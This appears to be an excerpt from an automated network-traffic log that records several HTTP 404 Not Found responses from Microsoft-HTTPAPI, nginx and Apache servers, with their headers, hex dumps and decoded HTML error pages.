Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Thu, 13 Mar 2025 12:00:50 GMTConnection: closeContent-Length: 315Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Thu, 13 Mar 2025 12:00:53 GMTConnection: closeContent-Length: 315Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Thu, 13 Mar 2025 12:00:55 GMTConnection: closeContent-Length: 315Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Thu, 13 Mar 2025 12:00:58 GMTConnection: closeContent-Length: 315Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 13 Mar 2025 12:01:47 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Tue, 25 Jul 2023 10:57:52 GMTETag: W/"afe-6014d9a456b59"Content-Encoding: brData Raw: 35 31 33 0d 0a c1 e8 57 00 00 bf bd a8 fb ce fd 7c bd 5d 84 c4 aa b8 8e 93 34 19 8e 63 21 75 ed 36 e8 d6 aa 63 6c 7c a1 b3 7d 89 8f 9d ef 2c fb 92 26 4c f9 fb 48 73 87 06 ad 58 b5 56 b4 a5 9d 8a e8 04 a5 b0 8e 81 5a 21 3e 3a 21 7e 68 57 7e 56 21 f1 af f9 eb e2 5c b3 06 cd c6 74 77 6f 61 0c c3 76 48 9f 6b b3 28 4b 4e b8 9f 30 c5 f0 c1 24 08 a2 45 b0 28 86 38 4d 82 86 0f 96 4f d0 52 2d 36 31 19 0c 06 53 4b aa 13 d9 81 5f 0e 9e 2b b8 b5 6d 9a 74 ea 5d 78 57 ae cf 4f 7f f4 c9 c2 0c c4 2a e1 3e f2 62 95 70 e0 44 74 5a f8 33 82 7d e4 c5 94 44 3e f2 12 aa 08 84 31 c9 72 aa 5a 78 e6 de b4 f5 c1 02 06 db 47 9e 62 8a 53 bf 56 ae c1 2c e3 14 ee 48 05 b3 b2 2b 22 cf 56 4c 71 ea 23 ff 4b 04 49 68 0b 87 32 1d 64 ac 13 2b 0c a1 14 8a 0a d5 c2 d3 e3 2f 80 07 77 67 16 3f 9e 59 84 5b 22 9c c4 f7 cc 4c 06 52 e5 e7 d2 5b 77 ae cf 3c 28 cd ce cf cd cd df 07 c3 a6 9a d7 63 74 29 95 d9 1e bf c4 22 15 b7 22 da 63 21 b5 06 be 50 62 82 29 46 b8 95 87 84 d3 96 33 59 2e 25 4c b0 a4 9b 8c de 16 fb c8 cb d5 80 53 50 83 94 b6 b0 a2 7d 65 87 79 8e 7d 34 01 8f 10 00 40 42 b2 0e 13 2e 94 9b 67 65 4a a2 88 89 ce 51 1a 22 96 74 4c 03 81 cc 22 9a 4d d1 2e df 89 c7 1a 8b d3 b6 72 a1 42 93 26 1a 22 1d b0 e7 1e b2 47 b3 36 97 4b d6 c0 85 3c cc 24 e7 99 ce 09 48 f8 b0 93 c9 ae 88 5c 28 56 83 c6 7b 41 a3 89 86 28 90 d1 20 e7 9f a0 2d 85 b2 da 24 61 7c e0 02 36 7f 19 6d ce cd 57 b8 04 b7 29 cb 06 b2 04 78 fc 62 fc 3b 8c 7f 35 1b 66 d3 ec 9b 27 b8 04 f8 f6 5d 58 b8 21 55 cc 42 5c 02 6c 7e 33 67 e6 6b 73 b4 fe ca 6c c0 42 26 e1 7e 15 97 00 df 64 19 e9 30 21 e1 43 f2 b0 0b 37 a4 8a 59 08 0b 99 c4 25 c8 89 c8 ad 9c 66 ac dd 44 00 00 09 3f cf 71 26 a8 15 53 d6 89 95 0b ce 64 ad 89 36 9c b3 cf a9 0b 8d a9 77 6a dc 43 d1 be b2 08 67 1d e1 42 48 85 a2 d9 5c 6c 28 b9 cc 5c 58 8a 99 a2 74 35 38 25 e3 40 13 95 5a da 6f 4e 58 4b 39 c7 04 92 47 6e 02 0b 09 50 0c 09 a4 7a 30 90 4a c9 c4 85 4a 39 0d 50 fd e0 4d ca 7b 54 b1 90 94 d8 f0 86 28 ae e4 55 aa 4d 05 4f b4 7d 25 1a 03 0f 51 1a 0d bb e5 1d 32 54 fb 54 ca 6c cd 24 ed a7 9c 30 91 0e b7 ef 21 96 92 a9 0b 4e da 87 5c 72 16 41 b1 dd 56 9a d8 00 41 d2 97 48 fd e4 14 40 0b 57 cb 69 1f 48 57 49 07 03 a2 e5 d4 bd 50 31 24 dd 9c 16 3f cc 69 5b 19 51 ce 08 22 45 b9 c5 7a bd 2e 81 56 5d c6 a9 52 34 b3 f2 94 84 49 54 bb 85 47 83 56 ae 59 6c 3d ef d3 40 f6 53 01 b5 d4 99 aa 01 9a 9d 59 a2 dd ac 90 df 69 c8 9e 80 d6 db 67 40 08 c0 6c 9b d3 d1 ae 39 30 c7 e6 4b 73 89 50 6b 3b 15 26 6c f4 7e 42 23 46 40 0a 3e 80 3c cc 28 15 40 44 04 ef 26 4c 7c c3 79 2e 94 af 0e a7 49 3f be 51 6f a4 fd ab f0 08 15 8a 01 61 b5 50 28 30 8e 94 30 9d ee 76 0b 43 54 58 2b ed 85 42 4f b5 57 ea f3 23 f3 94 08 a3 48 3d 40 c6 8a ee b0 1d 26 b0 4a d5 90 66 4e a1 d0 b9 b8 f7 ec da 54 78 85 a8 a4 05 f8 8a f0 32 15 38 6
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 13 Mar 2025 12:01:49 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Tue, 25 Jul 2023 10:57:52 GMTETag: W/"afe-6014d9a456b59"Content-Encoding: brData Raw: 35 31 33 0d 0a c1 e8 57 00 00 bf bd a8 fb ce fd 7c bd 5d 84 c4 aa b8 8e 93 34 19 8e 63 21 75 ed 36 e8 d6 aa 63 6c 7c a1 b3 7d 89 8f 9d ef 2c fb 92 26 4c f9 fb 48 73 87 06 ad 58 b5 56 b4 a5 9d 8a e8 04 a5 b0 8e 81 5a 21 3e 3a 21 7e 68 57 7e 56 21 f1 af f9 eb e2 5c b3 06 cd c6 74 77 6f 61 0c c3 76 48 9f 6b b3 28 4b 4e b8 9f 30 c5 f0 c1 24 08 a2 45 b0 28 86 38 4d 82 86 0f 96 4f d0 52 2d 36 31 19 0c 06 53 4b aa 13 d9 81 5f 0e 9e 2b b8 b5 6d 9a 74 ea 5d 78 57 ae cf 4f 7f f4 c9 c2 0c c4 2a e1 3e f2 62 95 70 e0 44 74 5a f8 33 82 7d e4 c5 94 44 3e f2 12 aa 08 84 31 c9 72 aa 5a 78 e6 de b4 f5 c1 02 06 db 47 9e 62 8a 53 bf 56 ae c1 2c e3 14 ee 48 05 b3 b2 2b 22 cf 56 4c 71 ea 23 ff 4b 04 49 68 0b 87 32 1d 64 ac 13 2b 0c a1 14 8a 0a d5 c2 d3 e3 2f 80 07 77 67 16 3f 9e 59 84 5b 22 9c c4 f7 cc 4c 06 52 e5 e7 d2 5b 77 ae cf 3c 28 cd ce cf cd cd df 07 c3 a6 9a d7 63 74 29 95 d9 1e bf c4 22 15 b7 22 da 63 21 b5 06 be 50 62 82 29 46 b8 95 87 84 d3 96 33 59 2e 25 4c b0 a4 9b 8c de 16 fb c8 cb d5 80 53 50 83 94 b6 b0 a2 7d 65 87 79 8e 7d 34 01 8f 10 00 40 42 b2 0e 13 2e 94 9b 67 65 4a a2 88 89 ce 51 1a 22 96 74 4c 03 81 cc 22 9a 4d d1 2e df 89 c7 1a 8b d3 b6 72 a1 42 93 26 1a 22 1d b0 e7 1e b2 47 b3 36 97 4b d6 c0 85 3c cc 24 e7 99 ce 09 48 f8 b0 93 c9 ae 88 5c 28 56 83 c6 7b 41 a3 89 86 28 90 d1 20 e7 9f a0 2d 85 b2 da 24 61 7c e0 02 36 7f 19 6d ce cd 57 b8 04 b7 29 cb 06 b2 04 78 fc 62 fc 3b 8c 7f 35 1b 66 d3 ec 9b 27 b8 04 f8 f6 5d 58 b8 21 55 cc 42 5c 02 6c 7e 33 67 e6 6b 73 b4 fe ca 6c c0 42 26 e1 7e 15 97 00 df 64 19 e9 30 21 e1 43 f2 b0 0b 37 a4 8a 59 08 0b 99 c4 25 c8 89 c8 ad 9c 66 ac dd 44 00 00 09 3f cf 71 26 a8 15 53 d6 89 95 0b ce 64 ad 89 36 9c b3 cf a9 0b 8d a9 77 6a dc 43 d1 be b2 08 67 1d e1 42 48 85 a2 d9 5c 6c 28 b9 cc 5c 58 8a 99 a2 74 35 38 25 e3 40 13 95 5a da 6f 4e 58 4b 39 c7 04 92 47 6e 02 0b 09 50 0c 09 a4 7a 30 90 4a c9 c4 85 4a 39 0d 50 fd e0 4d ca 7b 54 b1 90 94 d8 f0 86 28 ae e4 55 aa 4d 05 4f b4 7d 25 1a 03 0f 51 1a 0d bb e5 1d 32 54 fb 54 ca 6c cd 24 ed a7 9c 30 91 0e b7 ef 21 96 92 a9 0b 4e da 87 5c 72 16 41 b1 dd 56 9a d8 00 41 d2 97 48 fd e4 14 40 0b 57 cb 69 1f 48 57 49 07 03 a2 e5 d4 bd 50 31 24 dd 9c 16 3f cc 69 5b 19 51 ce 08 22 45 b9 c5 7a bd 2e 81 56 5d c6 a9 52 34 b3 f2 94 84 49 54 bb 85 47 83 56 ae 59 6c 3d ef d3 40 f6 53 01 b5 d4 99 aa 01 9a 9d 59 a2 dd ac 90 df 69 c8 9e 80 d6 db 67 40 08 c0 6c 9b d3 d1 ae 39 30 c7 e6 4b 73 89 50 6b 3b 15 26 6c f4 7e 42 23 46 40 0a 3e 80 3c cc 28 15 40 44 04 ef 26 4c 7c c3 79 2e 94 af 0e a7 49 3f be 51 6f a4 fd ab f0 08 15 8a 01 61 b5 50 28 30 8e 94 30 9d ee 76 0b 43 54 58 2b ed 85 42 4f b5 57 ea f3 23 f3 94 08 a3 48 3d 40 c6 8a ee b0 1d 26 b0 4a d5 90 66 4e a1 d0 b9 b8 f7 ec da 54 78 85 a8 a4 05 f8 8a f0 32 15 38 6
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 13 Mar 2025 12:01:52 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Tue, 25 Jul 2023 10:57:52 GMTETag: W/"afe-6014d9a456b59"Content-Encoding: brData Raw: 35 31 33 0d 0a c1 e8 57 00 00 bf bd a8 fb ce fd 7c bd 5d 84 c4 aa b8 8e 93 34 19 8e 63 21 75 ed 36 e8 d6 aa 63 6c 7c a1 b3 7d 89 8f 9d ef 2c fb 92 26 4c f9 fb 48 73 87 06 ad 58 b5 56 b4 a5 9d 8a e8 04 a5 b0 8e 81 5a 21 3e 3a 21 7e 68 57 7e 56 21 f1 af f9 eb e2 5c b3 06 cd c6 74 77 6f 61 0c c3 76 48 9f 6b b3 28 4b 4e b8 9f 30 c5 f0 c1 24 08 a2 45 b0 28 86 38 4d 82 86 0f 96 4f d0 52 2d 36 31 19 0c 06 53 4b aa 13 d9 81 5f 0e 9e 2b b8 b5 6d 9a 74 ea 5d 78 57 ae cf 4f 7f f4 c9 c2 0c c4 2a e1 3e f2 62 95 70 e0 44 74 5a f8 33 82 7d e4 c5 94 44 3e f2 12 aa 08 84 31 c9 72 aa 5a 78 e6 de b4 f5 c1 02 06 db 47 9e 62 8a 53 bf 56 ae c1 2c e3 14 ee 48 05 b3 b2 2b 22 cf 56 4c 71 ea 23 ff 4b 04 49 68 0b 87 32 1d 64 ac 13 2b 0c a1 14 8a 0a d5 c2 d3 e3 2f 80 07 77 67 16 3f 9e 59 84 5b 22 9c c4 f7 cc 4c 06 52 e5 e7 d2 5b 77 ae cf 3c 28 cd ce cf cd cd df 07 c3 a6 9a d7 63 74 29 95 d9 1e bf c4 22 15 b7 22 da 63 21 b5 06 be 50 62 82 29 46 b8 95 87 84 d3 96 33 59 2e 25 4c b0 a4 9b 8c de 16 fb c8 cb d5 80 53 50 83 94 b6 b0 a2 7d 65 87 79 8e 7d 34 01 8f 10 00 40 42 b2 0e 13 2e 94 9b 67 65 4a a2 88 89 ce 51 1a 22 96 74 4c 03 81 cc 22 9a 4d d1 2e df 89 c7 1a 8b d3 b6 72 a1 42 93 26 1a 22 1d b0 e7 1e b2 47 b3 36 97 4b d6 c0 85 3c cc 24 e7 99 ce 09 48 f8 b0 93 c9 ae 88 5c 28 56 83 c6 7b 41 a3 89 86 28 90 d1 20 e7 9f a0 2d 85 b2 da 24 61 7c e0 02 36 7f 19 6d ce cd 57 b8 04 b7 29 cb 06 b2 04 78 fc 62 fc 3b 8c 7f 35 1b 66 d3 ec 9b 27 b8 04 f8 f6 5d 58 b8 21 55 cc 42 5c 02 6c 7e 33 67 e6 6b 73 b4 fe ca 6c c0 42 26 e1 7e 15 97 00 df 64 19 e9 30 21 e1 43 f2 b0 0b 37 a4 8a 59 08 0b 99 c4 25 c8 89 c8 ad 9c 66 ac dd 44 00 00 09 3f cf 71 26 a8 15 53 d6 89 95 0b ce 64 ad 89 36 9c b3 cf a9 0b 8d a9 77 6a dc 43 d1 be b2 08 67 1d e1 42 48 85 a2 d9 5c 6c 28 b9 cc 5c 58 8a 99 a2 74 35 38 25 e3 40 13 95 5a da 6f 4e 58 4b 39 c7 04 92 47 6e 02 0b 09 50 0c 09 a4 7a 30 90 4a c9 c4 85 4a 39 0d 50 fd e0 4d ca 7b 54 b1 90 94 d8 f0 86 28 ae e4 55 aa 4d 05 4f b4 7d 25 1a 03 0f 51 1a 0d bb e5 1d 32 54 fb 54 ca 6c cd 24 ed a7 9c 30 91 0e b7 ef 21 96 92 a9 0b 4e da 87 5c 72 16 41 b1 dd 56 9a d8 00 41 d2 97 48 fd e4 14 40 0b 57 cb 69 1f 48 57 49 07 03 a2 e5 d4 bd 50 31 24 dd 9c 16 3f cc 69 5b 19 51 ce 08 22 45 b9 c5 7a bd 2e 81 56 5d c6 a9 52 34 b3 f2 94 84 49 54 bb 85 47 83 56 ae 59 6c 3d ef d3 40 f6 53 01 b5 d4 99 aa 01 9a 9d 59 a2 dd ac 90 df 69 c8 9e 80 d6 db 67 40 08 c0 6c 9b d3 d1 ae 39 30 c7 e6 4b 73 89 50 6b 3b 15 26 6c f4 7e 42 23 46 40 0a 3e 80 3c cc 28 15 40 44 04 ef 26 4c 7c c3 79 2e 94 af 0e a7 49 3f be 51 6f a4 fd ab f0 08 15 8a 01 61 b5 50 28 30 8e 94 30 9d ee 76 0b 43 54 58 2b ed 85 42 4f b5 57 ea f3 23 f3 94 08 a3 48 3d 40 c6 8a ee b0 1d 26 b0 4a d5 90 66 4e a1 d0 b9 b8 f7 ec da 54 78 85 a8 a4 05 f8 8a f0 32 15 38 6
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 13 Mar 2025 12:01:55 GMTContent-Type: text/htmlContent-Length: 2814Connection: closeVary: Accept-EncodingLast-Modified: Tue, 25 Jul 2023 10:57:52 GMTETag: "afe-6014d9a456b59"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 45 55 43 2d 4a 50 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 46 69 6c 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 58 53 45 52 56 45 52 20 49 6e 63 2e 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 49 4e 44 45 58 2c 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 2a 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 7d 0a 69 6d 67 20 7b 0a 20 20 20 20 62 6f 72 64 65 72 3a 20 30 3b 0a 7d 0a 75 6c 20 7b 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 32 65 6d 3b 0a 7d 0a 68 74 6d 6c 20 7b 0a 20 20 20 20 6f 76 65 72 66 6c 6f 77 2d 79 3a 20 73 63 72 6f 6c 6c 3b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 33 62 37 39 62 37 3b 0a 7d 0a 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 a5 e1 a5 a4 a5 ea a5 aa 22 2c 20 4d 65 69 72 79 6f 2c 20 22 a3 cd a3 d3 20 a3 d0 a5 b4 a5 b7 a5 c3 a5 af 22 2c 20 22 4d 53 20 50 47 6f 74 68 69 63 22 2c 20 22 a5 d2 a5 e9 a5 ae a5 ce b3 d1 a5 b4 20 50 72 6f 20 57 33 22 2c 20 22 48 69 72 61 67 69 6e 6f 20 4b 61 6b 75 20 47 6f 74 68 69 63 20 50 72 6f 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 37 35 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 77 68 69 74 65 3b 0a 7d 0a 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 7d 0a 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 68 32 20 7b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 6
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 13 Mar 2025 12:02:00 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
